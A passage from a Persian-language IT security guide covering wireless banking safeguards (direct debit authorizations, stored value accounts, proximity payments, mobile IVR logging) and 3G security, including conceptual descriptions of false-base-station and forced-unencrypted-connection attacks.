‫ﺩﺭ ﻣﻌﺎﻣﻼﺕ ﻣﺎﻟﻲ ﺑﻲﺳﻴﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﻨﺪ‪ .‬ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﺑﻌﻀﻲ ﺍﺯ ﻣﺸﺘﺮﻳﺎﻥ ﺑﻪ ﺑﺎﻧﻚ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺋﻤﻲ ﺑﺪﻫﻨﺪ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ ﺍﺯ‬
‫ﺣﺴﺎﺏ ﺁﻧﻬﺎ ﺍﻋﺘﺒﺎﺭ ﺑﺮﺩﺍﺷﺖ ﻛﻨﺪ ﻭ ﺑﻪ ﺣـﺴﺎﺏ ﺑﺮﺧـﻲ ﺍﺷـﺨﺎﺹ‬
‫ﺛﺎﻟــﺚ ﻭﺍﺭﻳــﺰ ﻧﻤﺎﻳــﺪ‪ .‬ﭼﻨــﻴﻦ ﺗﻮﺍﻓﻘﻬــﺎﻳﻲ ﻣــﻲﺗﻮﺍﻧــﺪ ﺍﺯ ﻃﺮﻳــﻖ‬
‫ﻣﻮﺍﻓﻘﺘﻨﺎﻣﻪﻫﺎﻱ ﺗﺼﺪﻳﻖ ﺍﻋﺘﺒﺎﺭ ﺣﺴﺎﺑﺮﺳﻲ ﻣـﺴﺘﻘﻴﻢ‪ ١٧٥‬ﺻـﻮﺭﺕ‬
‫‪175 Direct Debit Authorization Agreements‬‬
‫‪١٩٣‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺑﮕﻴﺮﺩ‪ .‬ﺑـﺎ ﺍﻳﻨﺤـﺎﻝ ﺩﺭﺻـﻮﺭﺕ ﻋﻤـﻞ ﺑـﻪ ﺍﻳـﻦ ﻣﻮﺍﻓﻘﺘﻨﺎﻣـﻪﻫـﺎ‪،‬‬
‫ﺍﺷﺨﺎﺹ ﺛﺎﻟﺚ ﻧﺒﺎﻳﺪ ﺑﺘﻮﺍﻧﻨﺪ ﺷﻨﺎﺳﻪﻫﺎﻱ ﺑﺎﻧﻜﻲ ﻣﺸﺘﺮﻳﺎﻥ )‪ID‬ﻫـﺎ‬
‫ﻭ ‪PIN‬ﻫﺎ( ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﻧﺪ ﻳﺎ ﺁﻧﻬﺎ ﺭﺍ ﺫﺧﻴﺮﻩ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫•‬
‫ﺑﻪ ﻣﺸﺘﺮﻱ ﺑﺎﻳﺪ ﺗﻮﺻﻴﻪ ﺷﻮﺩ ﻛﻪ ﺑﺮﺍﻱ ﺧـﺪﻣﺎﺕ ﻣﺨﺘﻠـﻒ‬
‫ﺍﺯ ‪PIN‬ﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪.‬‬
‫•‬
‫ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻳﻤﻦ ﺍﺯ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﺑﺎﻧﻜﺪﺍﺭﻱ ﻭ ﭘﺮﺩﺍﺧـﺖ‬
‫ﺳﻴﺎﺭ ﺑﺎﻳﺪ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻳﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺍﺑﺰﺍﺭﻫﺎﻱ‬
‫ﺳﻴﺎﺭ ﺑﻪ ﻣﺸﺘﺮﻱ ﺩﺍﺩﻩ ﺷﻮﺩ‪.‬‬
‫•‬
‫ﺍﻃﻼﻋﺎﺕ ﻻﺯﻡ ﺩﺭ ﻣﻮﺭﺩ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﻣﺸﺎﺟﺮﺍﺕ‪ ،‬ﺭﻭﺍﻟﻬـﺎﻱ‬
‫ﮔﺰﺍﺭﺵﺩﻫﻲ ﻭ ﺯﻣﺎﻥ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﺭﻓﻊ ﻭ ﺭﺟﻮﻉ ﺷـﻜﺎﻳﺎﺕ‬
‫ﺑﺎﻳﺪ ﺑﻪ ﻣﺸﺘﺮﻱ ﺍﺭﺍﺋﻪ ﮔﺮﺩﺩ‪.‬‬
‫ﺣﺴﺎﺑﻬﺎﻱ ﺫﺧﻴﺮﻩ‬
‫ﺣﺴﺎﺑﻬﺎﻱ ﺫﺧﻴﺮﻩ )‪ ١٧٦(SVA‬ﺗﻮﺳﻂ ﻣﺸﺘﺮﻳﺎﻧﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﺷـﻮﺩ‬
‫ﻛﻪ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩ ﺍﻱ ﺑﻪ ﺍﻳﻦ ﺣﺴﺎﺑﻬﺎ ﭘﻮﻝ ﻭﺍﺭﻳﺰ ﻣﻲﻛﻨﻨﺪ‪SVA .‬‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺭﻭﻱ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ ﺳـﻴﺎﺭ ﻗـﺮﺍﺭ ﮔﻴـﺮﺩ‪ .‬ﻫﻨﮕـﺎﻡ ﺍﻧﺠـﺎﻡ‬
‫ﻋﻤﻠﻴﺎﺕ ﭘﺮﺩﺍﺧﺖ‪ ،‬ﻫﻴﭻ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﻧﺒﺎﻳﺪ ﻣﻮﺭﺩ ﺩﺳﺘﺮﺳﻲ ﻗﺮﺍﺭ‬
‫ﮔﻴﺮﺩ‪ .‬ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﺍﻋﺘﺒﺎﺭ ﺍﺯ ﻳﻚ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﺑﻪ ﻳﻚ ﺣـﺴﺎﺏ‬
‫‪ SVA‬ﺣﺘﻤﹰﺎ ﺻﺎﺣﺐ ﺁﻥ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﺑﺎﻳﺪ ﺷﺨـﺼﹰﺎ ﺑـﻪ ﺍﻳﻨﻜـﺎﺭ‬
‫ﺍﻗﺪﺍﻡ ﻛﻨﺪ‪.‬‬
‫ﻻ ﺑــﺮﺍﻱ‬
‫ﺧــﺪﻣﺎﺕ ﭘﺮﺩﺍﺧــﺖ ﻧﺰﺩﻳــﻚ ﺑــﻲﺳــﻴﻢ‪ ١٧٧‬ﻣﻌﻤــﻮ ﹰ‬
‫ﺧﺮﺩﻩﻓﺮﻭﺷﻴﻬﺎﻱ ﺧﺎﺭﺝ ﺍﺯ ﺗﻌﺪﺍﺩ ﺑﻜﺎﺭ ﻣـﻲﺭﻭﻧـﺪ‪ .‬ﺍﻳـﻦ ﺗﺮﺍﻛﻨـﺸﻬﺎ‬
‫ﺗﻨﻬﺎ ﺑﺎﻳﺪ ﺯﻣﺎﻧﻲ ﻛﺎﻣـﻞ ﺷـﻮﻧﺪ ﻛـﻪ ﻣـﺸﺘﺮﻱ ﺩﺭ ﻧﻘﻄـﺔ ﻓـﺮﻭﺵ‬
‫ﺻﺮﺍﺣﺘﹰﺎ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﻮﺩ‪ .‬ﺍﮔﺮ ﭼﻨﻴﻦ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺘﻲ ﺻﻮﺭﺕ‬
‫ﻧﮕﺮﻓﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ‬
‫ﻣﺸﺘﺮﻱ ﺍﺯ ﻃﺮﻳﻖ ‪ SVA‬ﻣﺮﺑﻮﻃﻪ ﺑﻄﻮﺭ ﻏﻴﺮﺍﺭﺍﺩﻱ ﺩﭼﺎﺭ ﻛـﺴﺮﻱ‬
‫ﮔﺮﺩﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﺮﺍﻱ ﻫﺮ ﻧﻮﻉ ﺩﺭﺧﻮﺍﺳﺖ ﭘﺮﺩﺍﺧﺖ ﻭﺟﻪ‪ ،‬ﺗـﺼﺪﻳﻖ‬
‫ﻫﻮﻳﺖ ﺻﺮﻳﺢ ﻣﺸﺘﺮﻱ ﺑﺎﻳﺪ ﺍﺟﺒﺎﺭﻱ ﺑﺎﺷﺪ‪.‬‬
‫ﭘﺎﺳﺦ ﺗﻌﺎﻣﻠﻲ ﺻﻮﺗﻲ‬
‫ﺧﺪﻣﺎﺕ ﭘﺎﺳﺦ ﺗﻌﺎﻣﻠﻲ ﺻﻮﺗﻲ ﺳﻴﺎﺭ )‪ ١٧٨(Mobile IVR‬ﻧﺴﺒﺖ ﺑـﻪ‬
‫ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﺁﺳﻴﺐ ﭘـﺬﻳﺮ ﻫـﺴﺘﻨﺪ‪ .‬ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪ IVR‬ﻧﺒﺎﻳـﺪ‬
‫ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ ﭘﺮﺑﻬﺎ ﻭ ﻳﺎ ﭘﺮﻣﺨﺎﻃﺮﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪ .‬ﺗﻤﺎﻡ ﺍﺗﺼﺎﻻﺕ‬
‫‪ - IVR‬ﺍﺯ ﺟﻤﻠــﻪ ﺷــﻤﺎﺭﻩ ﺗﻠﻔــﻦ ﺗﻤــﺎﺱﮔﻴﺮﻧــﺪﻩ ﻭ ﺗﺮﺗﻴــﺐ‬
‫ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺗﻮﺳﻂ ﻣﺸﺘﺮﻱ ﺑﺎﻳﺪ ﺛﺒﺖ ﺷﻮﺩ؛ ﺍﻣـﺎ ﺍﻳـﻦ‬
‫ﺛﺒﺘﻬﺎ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﻧﺒﺎﻳﺪ ﺷﺎﻣﻞ ‪ PIN‬ﻭ ﺍﻃﻼﻋﺎﺕ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‬
‫ﻣﺸﺘﺮﻱ ﮔﺮﺩﺩ‪.‬‬
‫ﻧﺴﻞ ﺳﻮﻡ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺑﻪ ﺍﺧﺘﺼﺎﺭ ‪ 3G‬ﺧﻮﺍﻧﺪﻩ ﻣـﻲﺷـﻮﺩ ﻭ‬
‫ﺑﻪ ﭘﻴﺸﺮﻓﺘﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑـﻲ ﺳـﻴﻢ ﺩﺭ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﺨﺘﻠـﻒ‬
‫ﺍﺷﺎﺭﻩ ﺩﺍﺭﺩ‪ .‬ﻫﺪﻑ ﺍﻭﻟﻴﺔ ﺍﻳﻦ ﻃﺮﺡ ﺑـﺎﻻﺑﺮﺩﻥ ﺳـﺮﻋﺖ ﺍﻧﺘﻘـﺎﻝ ﺍﺯ‬
‫‪ ۹،۵‬ﻛﻴﻠﻮﺑﻴﺖ ﺩﺭ ﺛﺎﻧﻴﻪ ﺑﻪ ‪ ۲‬ﻣﮕﺎﺑﻴﺖ ﺩﺭ ﺛﺎﻧﻴـﻪ ﺍﺳـﺖ‪ .‬ﺩﺭ ﺯﻣﻴﻨـﺔ‬
‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ‪ ،‬ﻫﺪﻑ ﺍﺻﻠﻲ ﻃﺮﺍﺣﻲ ﻳﻚ ﺳﻴﺴﺘﻢ‬
‫ﺑﺪﻭﻥ ﻧﻘﺺ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﻜﻪ ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻤﻲ ﺍﺳﺖ ﻛﻪ ﺍﮔـﺮ ﻧﻴـﺎﺯ‬
‫ﺑﻪ ﺁﻥ ﺍﺣﺴﺎﺱ ﺷﺪ ﺑﺘﻮﺍﻧﺪ ﺑﺎ ﭘﻴﺸﺮﻓﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺳﺎﺯﮔﺎﺭﻱ ﭘﻴـﺪﺍ‬
‫ﻛﻨﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺣﻤﻼﺗﻲ ﻛﻪ ﻭﻗﻮﻉ ﺁﻧﻬـﺎ ﺩﺭ ﺷـﺒﻜﻪﻫـﺎﻱ ﻧـﺴﻞ‬
‫ﺩﻭﻡ ﻭ ﺣﺘﻲ ﻛﻤﻲ ﭘﻴﺸﺮﻓﺘﻪﺗﺮ ﺍﺯ ﺁﻥ ﻣﻤﻜﻦ ﺑـﻮﺩ‪ ،‬ﺩﺭ ﻣﺤﻴﻄﻬـﺎﻱ‬
‫ﻧﺴﻞ ﺳﻮﻡ ﺑﻜﻠﻲ ﺣﺬﻑ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺍﺳﺘﺤﻜﺎﻡ ﺳﺎﺧﺘﺎﺭ ﺍﻣﻨﻴﺘﻲ ﻧﺴﻞ ﺳﻮﻡ‬
‫ﺍﻣﻨﻴﺖ ﻧﺴﻞ ﺳﻮﻡ ﺑﺮ ﻣﺒﻨﺎﻱ ﺍﻣﻨﻴﺖ ‪ GSM‬ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺍﺳـﺖ‪،‬‬
‫ﺍﻣﺎ ﺑﺎ ﺗﻐﻴﻴﺮﺍﺕ ﺯﻳﺮ‪:‬‬
‫•‬
‫ﻳﻜﻲ ﺍﺯ ﺗﻐﻴﻴﺮﺍﺕ ﺑﺮﺍﻱ ﻏﻠﺒـﻪ ﺑـﺮ ﺣﻤﻠـﻪ ﺍﻱ ﻣﻮﺳـﻮﻡ ﺑـﻪ‬
‫ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠﻲ‪ ١٧٩‬ﺍﻧﺠﺎﻡ ﮔﺮﻓﺖ‪ .‬ﺩﺭ ﺍﻳـﻦ ﻣﻜـﺎﻧﻴﺰﻡ‬
‫ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺷﻤﺎﺭﺓ ﺗﻮﺍﻟﻲ ﺑﻪ ﺩﺍﺩﻩﻫـﺎﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
‫ﺍﺿﺎﻓﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﺪ ﺩﺳﺘﮕﺎﻩ ﺳﻴﺎﺭ ﺧﻮﺍﻫﺪ‬
‫ﺗﻮﺍﻧﺴﺖ ﺷﺒﻜﻪ ﺭﺍ ﻣﻮﺭﺩ ﺷﻨﺎﺳﺎﻳﻲ ﻗﺮﺍﺭ ﺩﻫﺪ‪.‬‬
‫•‬
‫ﻃﻮﻝ ﻛﻠﻴﺪ ﺭﻣـﺰ ﺍﻓـﺰﺍﻳﺶ ﻳﺎﻓﺘـﻪ ﺗـﺎ ﺍﻣﻜـﺎﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻗﻮﻳﺘﺮ ﻫﻢ ﻓﺮﺍﻫﻢ ﺷﻮﺩ‪.‬‬
‫•‬
‫ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻳﻲ ﺑـﺮﺍﻱ ﺑﻬﺒـﻮﺩ ﺍﻣﻨﻴـﺖ ﺩﺍﺧـﻞ ﺷـﺒﻜﻪﻫـﺎ ﻭ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﻟﺤﺎﻅ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺁﻣﻮﺯﺵ ﻣﺸﺘﺮﻱ‬
‫ﺑﺎﻧﻜﻬﺎ ﺑﺎﻳﺪ ﻣﺼﺮﻑﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻲﺳـﻴﻢ‬
‫ﺭﺍ ﺑﻪ ﺭﻭﺷﻬﺎﻱ ﺯﻳﺮ ﺁﻣﻮﺯﺵ ﺩﻫﻨﺪ‪:‬‬
‫‪176 Stored Value Accounts‬‬
‫‪177 Close Proximity Wireless Payments‬‬
‫‪178 Mobile Interactive Voice Response‬‬
‫‪179 False Base Station‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﭘﺮﺩﺍﺧﺘﻬﺎﻱ ﻧﺰﺩﻳﻚ ﺑﻲﺳﻴﻢ‬
‫ﻧﮕﺎﻩ ﺑﻪ ﺁﻳﻨﺪﻩ‪ :‬ﻓﻨﺎﻭﺭﻱ ﻧﺴﻞ ﺳﻮﻡ‬
‫‪١٩٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫•‬
‫ﺍﻣﻨﻴﺖ ﺑﻪ ﺟﺎﻱ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﻣﺒﺘﻨـﻲ ﺑـﺮ ﺳـﻮﺋﻴﭻ ﺷـﺪﻩ‬
‫)ﻣﺜﻞ ‪ .(GSM‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﺗﺼﺎﻻﺕ ﻣﻴـﺎﻥ ﺍﻳـﺴﺘﮕﺎﻩ ﺛﺎﺑـﺖ ﻭ‬
‫ﺳﻮﺋﻴﭻ ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪.‬‬
‫•‬
‫ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻫﻮﻳﺖ ﭘﺎﻳﺎﻧﻪ )‪ ١٨٠(IMEI‬ﺑﺠـﺎﻱ‬
‫ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ‪ GSM‬ﻭﺟﻮﺩ ﺩﺍﺷﺖ‪ ،‬ﺍﺯ ﻧﻮ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫•‬
‫ﺍﻟﮕﻮﺭﻳﺘﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺗﻌﺮﻳﻒ ﻧـﺸﺪﻩ‪ ،‬ﺍﻣـﺎ ﺭﺍﻫﻨﻤـﺎﻳﻲ‬
‫ﺑﺮﺍﻱ ﺍﻧﺘﺨﺎﺏ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﺩ‪.‬‬
‫•‬
‫ﻼ ﺑـﻴﻦ ‪ GSM‬ﻭ‬
‫ﺩﺭ ﺯﻣﺎﻥ ﮔﺸﺖﺯﺩﻥ ﻣﻴﺎﻥ ﺷﺒﻜﻪﻫﺎ‪ ،‬ﻣﺜ ﹰ‬
‫‪ ،3GPP‬ﺗﻨﻬﺎ ﺳﻄﺤﻲ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ ﻛـﺎﺭﺕ‬
‫ﻫﻮﺷﻤﻨﺪ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻛـﺎﺭﺕ‬
‫ﻫﻮﺷــﻤﻨﺪ ‪ GSM‬ﺩﺭ ﺷــﺒﻜﻪ ‪ 3GPP‬ﺩﺭ ﺑﺮﺍﺑــﺮ ﺣﻤﻠــﺔ‬
‫ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠـﻲ ﻫﻤﭽﻨـﺎﻥ ﻣـﻮﺭﺩ ﻣﺤﺎﻓﻈـﺖ ﻗـﺮﺍﺭ‬
‫ﻧﺪﺍﺭﺩ‪.‬‬
‫ﺳﻴﺴﺘﻢ ﻧﺴﻞ ﺳﻮﻡ ﻧﺴﺒﺖ ﺑـﻪ ﻫﻤﺘـﺎﻱ ‪ GSM‬ﺧـﻮﺩ ﺍﺯ ﺍﻣﻨﻴـﺖ‬
‫ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ .‬ﺍﻟﺒﺘﻪ ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﮔﻔﺘـﻪ ﺷـﺪ‬
‫ﻫﻮﺷﻤﻨﺪﻱ ﻭ ﺯﻳﺮﻛﻲ ﻣﻬﺎﺟﻤﻴﻦ ﺭﺍ ﻫﻴﭽﮕـﺎﻩ ﻧﺒﺎﻳـﺪ ﺩﺳـﺖ ﻛـﻢ‬
‫ﮔﺮﻓﺖ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﺯ ﺩﻳﺪ ﻣﺒﺘﻨﻲ ﺑﺮ ﺗﺌﻮﺭﻱ‪ ،‬ﺩﺭ ﺷـﺒﻜﻪﻫـﺎﻱ ﻧـﺴﻞ‬
‫ﻼ ﺑﻪ ﺁﻧﻬﺎ‬
‫ﺳﻮﻡ ﻧﻴﺰ ﺍﻣﻜﺎﻥ ﻭﻗﻮﻉ ﺣﻤﻼﺕ ﺟﺪﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺫﻳ ﹰ‬
‫ﺍﺷﺎﺭﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺍﻋﺘﻤﺎﺩ ﺑﻪ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠﻲ‬
‫ﺍﻳﻦ ﺣﻤﻠﻪ‪ ،‬ﺣﻤﻠﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﻳﺎ ﺍﻳـﺴﺘﮕﺎﻩ‬
‫ﺳﻴﺎﺭ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻭ ﺍﺯ ﺍﻳﻦ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻱ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﺭﺑﺮ ﺑﻪ ﻳـﻚ ﺍﻳـﺴﺘﮕﺎﻩ ﺛﺎﺑـﺖ ﺟﻌﻠـﻲ‬
‫ﻣﺘﺼﻞ ﺷﻮﺩ‪ .‬ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠﻲ ﻣﻲﺗﻮﺍﻧﺪ ﮔﺎﻫﻲ ﺩﺭ ﻧﻘﺶ‬
‫ﺗﻜﺮﺍﺭﻛﻨﻨﺪﻩ ﻭ ﮔﺎﻫﻲ ﻧﻴﺰ ﺩﺭ ﻧﻘﺶ ﺗﻘﻮﻳـﺖﻛﻨﻨـﺪﺓ ﺩﺭﺧﻮﺍﺳـﺘﻬﺎﻱ‬
‫ﺗﺒــﺎﺩﻟﻲ ﻣﻴــﺎﻥ ﺷــﺒﻜﻪ ﻭ ﻛــﺎﺭﺑﺮ ﻋﻤــﻞ ﻛﻨــﺪ‪ ،‬ﻭ ﺩﺭ ﺍﻳــﻦ ﻣﻴــﺎﻥ‬
‫ﺩﺭﺧﻮﺍﺳﺘﻬﺎ ﻳﺎ ﭘﻴﺎﻣﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ‪.‬‬
‫ﻣﻌﻤﺎﺭﻱ ﺍﻣﻨﻴﺘﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺩﺳﺘﻜﺎﺭﻱ ﭘﻴﺎﻣﻬﺎﻱ ﺗﺒـﺎﺩﻟﻲ ﻣﻴـﺎﻥ‬
‫ﺷﺒﻜﻪ ﻭ ﻛﺎﺭﺑﺮ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﺪ‪ .‬ﺣﻔﺎﻇـﺖ ﺍﺯ ﺟﺎﻣﻌﻴـﺖ ﭘﻴﺎﻣﻬـﺎﻱ‬
‫ﺣﻴﺎﺗﻲ ﺷﺒﻜﻪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺑﻪ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻭﻗـﻮﻉ ﺑﺮﺧـﻲ ﺣﻤـﻼﺕ‬
‫ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ‪ -‬ﻛﻪ ﺑﺎ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴﺮ ﺩﺭ ﻣﺤﺘﻮﺍﻱ ﭘﻴﺎﻡ ﺻـﻮﺭﺕ‬
‫ﻣﻲﮔﻴﺮﺩ ‪ -‬ﻧﻴﺰ ﻛﻤﻚ ﻛﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺠﺎ‪ ،‬ﺣﻤﻠـﺔ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ‬
‫ﺗﻨﻬﺎ ﺗﺎ ﺯﻣﺎﻧﻲ ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺩﺍﻣـﻪ ﻳﺎﺑـﺪ ﻛـﻪ ﻧﻔـﻮﺫﮔﺮ ﻓﻌـﺎﻝ ﺑﺎﺷـﺪ؛‬
‫ﺑﺮﺧﻼﻑ ﺣﻤﻼﺕ ﺑﺎﻻ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﭘﺎﻳﺎﻥ ﺩﺧﺎﻟﺖ ﻧﻔﻮﺫﮔﺮ ﻫﻢ ﺍﺩﺍﻣﻪ‬
‫‪180 Integrity Mechanisms for the Terminal Identity‬‬
‫ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﺣﻤﻼﺕ ﻗﺎﺑﻞ ﻗﻴﺎﺱ ﺑﺎ ﺣﻤﻼﺗﻲ ﭼﻮﻥ ﺍﺭﺳﺎﻝ‬
‫ﭘﺎﺭﺍﺯﻳﺘﻬﺎﻱ ﺭﺍﺩﻳﻮﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺍﮔﺮ ﺑﺨـﻮﺍﻫﻴﻢ ﺁﻧﻬـﺎ ﺭﺍ ﺩﺭ ﺗﻤـﺎﻡ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﺩﻳﻮﻳﻲ ﺧﻨﺜﻲ ﻛﻨﻴﻢ‪ ،‬ﺑﺎ ﻣـﺸﻜﻼﺕ ﺯﻳـﺎﺩﻱ ﺭﻭﺑـﺮﻭ‬
‫ﻫﺴﺘﻴﻢ‪.‬‬
‫ﺍﺟﺒﺎﺭ ﺑﻪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﻣﺰ ﻧﺸﺪﻩ‬
‫ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻠﻪ ﻧﻴﺰ ﺑﻪ ﻳـﻚ ﺍﻳـﺴﺘﮕﺎﻩ ﺛﺎﺑـﺖ ﻳـﺎ ﺍﻳـﺴﺘﮕﺎﻩ ﺳـﻴﺎﺭ‬
‫ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﻧﻴﺎﺯ ﺩﺍﺭﺩ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ ﻛﺎﺭﺑﺮ ﻣﻮﺭﺩ ﻧﻈﺮ ﺑـﻪ ﺍﻳـﺴﺘﮕﺎﻩ‬
‫ﺛﺎﺑﺖ ﺟﻌﻠﻲ ﺍﻋﺘﻤﺎﺩ ﻣﻲﻛﻨﺪ‪ ،‬ﻣﻬﺎﺟﻢ ﻗﺮﺑـﺎﻧﻲ ﺭﺍ ﺑـﺎ ﻳـﻚ ﺗﻤـﺎﺱ‬
‫ﺗﻠﻔﻨﻲ ﻣﺨﺎﻃﺐ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪ .‬ﻛﺎﺭﺑﺮ ﻧﻴﺰ ﺭﻭﺍﻝ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺍﻭﻟﻴـﻪ ﺭﺍ‬
